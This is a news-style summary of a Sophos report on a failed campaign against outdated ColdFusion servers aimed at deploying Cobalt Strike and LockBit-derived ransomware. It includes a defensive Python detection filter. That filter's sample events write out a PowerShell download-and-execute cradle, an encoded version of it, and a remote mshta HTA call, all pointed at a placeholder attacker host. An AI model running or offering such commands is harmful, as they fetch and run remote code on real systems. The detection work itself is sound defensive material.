Unknown Actor Targets Windows Servers via Old Adobe Software
In the realm of cybersecurity, servers have always been a high-value target for attackers. Given the privileges they hold, a compromised server makes lateral movement within a network far easier. Recently, Sophos X-Ops reported a string of attempted intrusions against Windows servers running outdated versions of Adobe’s ColdFusion software. Although unsuccessful, these persistent attempts shed light on the techniques and determination of today’s cybercriminals.
The Sophos team identified a variety of threats targeting servers, with Cobalt Strike Beacons, ransomware, PowerShell backdoors, miners, and webshells topping the list. Between September and October, a single actor, identified by a consistent pattern of activity, tried to exploit vulnerabilities in unsupported Adobe ColdFusion versions in order to deploy ransomware. The payloads revealed an intention to deploy a ransomware variant derived from the leaked LockBit 3.0 source code.
On September 20, after gaining initial access, the attacker made a series of attempts to exploit the server. Starting with a DNS test using a “ping” command aimed at an attacker-controlled host, the actor sought to confirm that the server could resolve and reach hosts outside the network. Their next move, after confirming the server’s outbound connectivity, was to execute a PowerShell script intended to download and run a Cobalt Strike Beacon. This attempt, however, was foiled by Sophos’ behavioral detection mechanism.
Not one to back down easily, the attacker made multiple similar attempts, using different methods and payloads, including a reverse interactive PowerShell session and an encoded Cobalt Strike Beacon loader, all designed to operate discreetly. Despite these relentless efforts, every attempt was blocked by the server’s endpoint protection.
Days later, the same attacker returned with an arsenal of fresh techniques. Their persistence was evident when they employed an HTA (HTML Application) file, aiming yet again to deploy the elusive Cobalt Strike Beacon. However, even this approach was halted by Sophos’ detection system.
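The sequence above (ping to an external host, a PowerShell download cradle, an encoded PowerShell loader, then an HTA) is the kind of chain a defender can flag from process-creation telemetry. The following Python triage filter is an added example, not code from the Sophos report; the parent-process names, the tag names and the ATTACKER-HOST.example URL are assumptions, and the sample events are constructed.

```python
import base64
import re

# Assumed parent-process names for the ColdFusion service and its Java worker;
# the article names no processes, so tune these to your own baseline.
WEB_SERVER_PARENTS = {"coldfusion.exe", "java.exe"}
LOLBINS = {"ping.exe", "cmd.exe", "powershell.exe", "mshta.exe"}

DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE payload behind a PowerShell -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return ""

def classify(event: dict[str, str]) -> list[str]:
    """Return the detection tags that fire for one process-creation event."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    tags = []
    if parent in WEB_SERVER_PARENTS and image in LOLBINS:
        tags.append("webserver-spawned-shell")          # ping/cmd/powershell/mshta under ColdFusion
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded:
            tags.append("encoded-powershell")            # the encoded Beacon loader attempt
        if DOWNLOAD_CRADLE.search(cmd) or DOWNLOAD_CRADLE.search(decoded):
            tags.append("powershell-download-cradle")    # download-and-run of a stager
    if image == "mshta.exe" and re.search(r"\.hta\b|https?://", cmd, re.I):
        tags.append("mshta-remote-hta")                  # the HTA-based attempt
    return tags

# Constructed sample events mirroring the article's sequence; ATTACKER-HOST.example
# is a placeholder, not an indicator from the report.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-HOST.example/s')"
SAMPLE_EVENTS = [
    {"parent": "coldfusion.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c ping -n 1 ATTACKER-HOST.example"},
    {"parent": "coldfusion.exe", "image": "powershell.exe", "cmdline": f'powershell -nop -w hidden -c "{_CRADLE}"'},
    {"parent": "coldfusion.exe", "image": "powershell.exe",
     "cmdline": "powershell -enc " + base64.b64encode(_CRADLE.encode("utf-16-le")).decode()},
    {"parent": "coldfusion.exe", "image": "mshta.exe", "cmdline": "mshta http://ATTACKER-HOST.example/x.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]
```

Only the last, benign event produces no tags; the three tags on the encoded event show why decoding -EncodedCommand before matching matters.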
Perhaps most intriguing was the discovery that the attacker had inadvertently left directory listings open on their web server, exposing their toolkit. This “treasure trove” provided a glimpse of all the tools and the intended final ransomware payload. That ransomware, named “BlackDog 2023”, appeared to be built from LockBit 3.0’s leaked source code, pointing to a potentially new ransomware family.
From the data, it’s evident that the targeted servers were running ColdFusion 11.x, a version Adobe ceased supporting in 2021. The exposure of such obsolete software underscores the critical need for timely updates and patches. Sophos emphasizes that, while endpoint protection can shield against many attacks, it’s no substitute for regular software updates. They strongly advocate migrating to current, supported versions of server products, or, if that’s unfeasible, putting rigorous mitigations in place for the known vulnerabilities.
In this evolving cybersecurity landscape, while sophisticated tools and techniques might be the weapon of choice for hackers, diligence, updated defenses, and an observant eye can still keep them at bay.